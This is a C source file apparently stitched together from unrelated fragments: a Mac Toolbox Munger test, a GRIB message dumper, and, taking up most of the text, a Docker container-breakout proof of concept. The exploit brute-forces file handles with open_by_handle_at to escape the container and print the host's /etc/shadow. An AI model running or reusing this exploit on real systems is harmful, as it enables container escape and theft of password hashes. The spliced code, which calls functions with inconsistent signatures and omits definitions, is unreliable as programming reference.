static void
munger_test (handle_state h_s,
offset_state offset_s,
ptr_state ptr1_s,
len_state len1_s,
ptr_state ptr2_s,
len_state len2_s)
{
Handle h;
LONGINT offset;
Ptr ptr1;
LONGINT len1;
Ptr ptr2;
LONGINT len2;
LONGINT retval;
LONGINT d0;
h = new_handle (h_s);
offset = new_offset (offset_s, GetHandleSize (h));
ptr1 = new_ptr (ptr1_s);
len1 = new_len (len1_s);
ptr2 = new_ptr (ptr2_s);
len2 = new_len (len2_s);
dump_handle (h);
retval = Munger_invoker (h, offset, ptr1, len1, ptr2, len2, &d0);
dump_handle (h);
dump_retval_d0 (retval, d0);
if (h_s >= handle_nil_master)
DisposeHandle (h);
}
int dump_file(const char* file,const char* out)
{
FILE *f = fopen(file,"r");
FILE *o = fopen(out,"w");
int e = 0;
grib_handle *h;
const void* b;
size_t s;
int count = 0;
char identifier[10];
size_t size = sizeof(identifier);
if(!f) {
perror(file);
exit(1);
}
h = grib_handle_new_from_file(NULL,f,&e);
while(h)
{
GRIB_CHECK(grib_get_message(h,&b,&s),file);
GRIB_CHECK(grib_get_string(h,"identifier",identifier,&size),file);
++count;
fprintf(o,"%s { # %d\n",identifier,count);
dump_handle(o,h);
fprintf(o,"};\n");
grib_handle_delete(h);
e = 0;
h = grib_handle_new_from_file(NULL,f,&e);
}
GRIB_CHECK(e,file);
return 0;
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}
int main()
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
close(fd2); close(fd1);
return 0;
}
